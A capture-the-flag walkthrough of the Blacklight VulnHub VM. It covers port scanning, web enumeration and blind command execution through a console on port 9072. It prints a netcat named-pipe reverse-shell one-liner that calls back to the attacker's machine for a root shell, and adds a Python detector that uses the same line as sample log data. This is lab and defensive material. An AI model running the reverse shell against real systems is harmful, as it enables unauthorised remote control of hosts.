BlackLight VulnHub Walkthrough

FalconSpy
Feb 20, 2019


The Blacklight Vulnhub VM was a rather short and simple system to pen test but may have a few tricks to it as well as rabbit holes. There were a few flags but I just wanted to obtain root. As such, the flags will not be listed in this particular walkthrough.

The Blacklight Vulnhub VM download can be found here: https://www.vulnhub.com/entry/blacklight-1,242/

Date Released: 8 June 2018
Author: Carter B
Series: Blacklight

Here’s the basic description taken from Vulnhub:

Recommend that you use VirtualBox

1. Service Enumeration

Using the following nmap command: nmap -O -A -sT -sV -p- -T5 192.168.1.28 -vvv

We get the following output

root@kali:~# nmap -O -A -sT -sV -p- -T5 192.168.1.28 -vvv
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-19 04:37 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:37
Completed NSE at 04:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:37
Completed NSE at 04:37, 0.00s elapsed
Initiating ARP Ping Scan at 04:37
Scanning 192.168.1.28 [1 port]
Completed ARP Ping Scan at 04:37, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:37
Completed Parallel DNS resolution of 1 host. at 04:37, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:37
Scanning 192.168.1.28 [65535 ports]
Discovered open port 80/tcp on 192.168.1.28
Discovered open port 9072/tcp on 192.168.1.28
Completed Connect Scan at 04:37, 3.03s elapsed (65535 total ports)
Initiating Service scan at 04:37
Scanning 2 services on 192.168.1.28
Completed Service scan at 04:39, 146.26s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.28
NSE: Script scanning 192.168.1.28.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 1.01s elapsed
Nmap scan report for 192.168.1.28
Host is up, received arp-response (0.00026s latency).
Scanned at 2018-07-19 04:37:21 EDT for 152s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open unknown syn-ack
| fingerprint-strings:
| DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|_ BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
TCP/IP fingerprint:
Uptime guess: 30.141 days (since Tue Jun 19 01:16:24 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.1.28
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.44 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)

We see two open ports: Apache httpd 2.4.29 on port 80 and an unrecognised service on port 9072 that greets every probe with the banner "BLACKLIGHT console mk1. Type .help for instructions".

2. Web Enumeration

I ran several web enumeration tools (nikto, dirb and dirbuster). Nothing of interest turned up apart from robots.txt, which all three tools found. Running nikto against the Blacklight VM gives the following output:

Viewing the robots.txt file we get:

The flag1.txt file contains the first flag. As stated at the beginning of this walkthrough, I was not particularly concerned with collecting the flags. However, flag1.txt also contains a hint about the service running on port 9072:

The useful part of the hint is the reference to 9072. The "secret is at home" part is not useful and is just misleading.

The blacklight.dict file is, of course, a dictionary file. It is probably meant for obtaining a flag elsewhere on the system or for some other step.

3. Port 9072 Enumeration

I started with telnet to see whether I could connect to the service and what it presented:

We have access to four commands:

  • help: displays the menu
  • readhash: displays a SHA-256 hash (b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6)
  • exec: executes a command on the server
  • quit: closes the connection

The hash returned by readhash is probably used for something else on the system, and we were not concerned with it here. I did run it against the dictionary file with John the Ripper using john --wordlist=/root/Desktop/blacklight.dict --format=raw-sha256 hash.txt and got nothing interesting back. Go figure!

This portion of the penetration test has a gotcha. If you run exec twice, readhash twice, or readhash and exec once each, the server locks you out completely. Once locked out, the only way back in is to reset the VM.

Whenever a system or application lets a user submit or execute commands, that should always be treated as one of the primary attack vectors. In this particular case it was exactly the vector we were looking for.

There is an additional gotcha with the exec command: it returns no output from whatever you give it to run. Everything happens blind on the server. I confirmed that commands were actually executing by watching for ICMP packets with tcpdump on my attacking box:

tcpdump -i eth0 icmp

In the above screenshot, we can see the ping request I performed on the target using .exec `ping -c 1 192.168.1.29`

I do not recommend using ping as a test, especially if you are unsure how many attempts you have before being locked out. Since we control the VM, though, we can simply reset it to get our two attempts back.

Using one of the common reverse shells found on numerous cheat sheet websites ( http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ), we were able to get a reverse shell back to our Kali box. After starting a netcat listener on Kali, I ran the following command on the victim machine through exec:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.29 8080 >/tmp/f

This of course requires netcat to be present on the target. In our case it was.

On our Kali machine we receive the shell which was running as root:
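The named-pipe reverse shell used above has a distinctive shape in process-execution telemetry (a fifo creation, an interactive shell, stderr merged into stdout, and netcat dialling out to an IP address in one command line). The following detector, an added example that is not part of the original walkthrough, scores each command line on those indicators. The log format (timestamp, user, command line) and the sample lines are constructed; on a real host the source would be auditd EXECVE records or EDR process-creation events.

```python
"""Flag mkfifo/netcat reverse-shell one-liners in process-exec logs.

Added example; log format and sample lines are constructed.
"""
import re
import shlex
from dataclasses import dataclass, field

NETCAT_BINS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh"}
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


@dataclass
class Finding:
    line_no: int
    user: str
    reasons: list = field(default_factory=list)


def _stages(cmdline: str):
    """Split a one-liner into its stages on ; | && || and tokenise each."""
    for stage in re.split(r"\s*(?:\|\||&&|[;|])\s*", cmdline):
        if stage:
            try:
                yield shlex.split(stage)
            except ValueError:          # unbalanced quotes: fall back
                yield stage.split()


def score(cmdline: str) -> list:
    """Return the indicators present in one command line."""
    stages = [s for s in _stages(cmdline) if s]
    base = lambda argv: argv[0].rsplit("/", 1)[-1]   # strip any path
    reasons = []
    if any(base(s) == "mkfifo" for s in stages):
        reasons.append("mkfifo creates a named pipe")
    if any(base(s) in SHELLS and "-i" in s for s in stages):
        reasons.append("interactive shell (-i)")
    if any(base(s) in NETCAT_BINS and IPV4.search(" ".join(s)) for s in stages):
        reasons.append("netcat connecting to an IP address")
    if "2>&1" in cmdline:
        reasons.append("stderr merged into stdout")
    return reasons


def detect(log_text: str, min_indicators: int = 3) -> list:
    """Return a Finding for every line with at least min_indicators hits."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        _ts, user, cmdline = line.split(" ", 2)
        reasons = score(cmdline)
        if len(reasons) >= min_indicators:
            findings.append(Finding(n, user, reasons))
    return findings


SAMPLE_LOG = """\
2018-07-19T04:45:01 root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.29 8080 >/tmp/f
2018-07-19T04:45:07 www-data mkfifo /tmp/build.pipe
2018-07-19T04:45:09 root nc -z 127.0.0.1 80
2018-07-19T04:45:12 root bash -c "ping -c 1 192.168.1.29"
"""
```

Only the first sample line trips all four indicators; a lone mkfifo or a local netcat port check scores one each and stays below the threshold.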
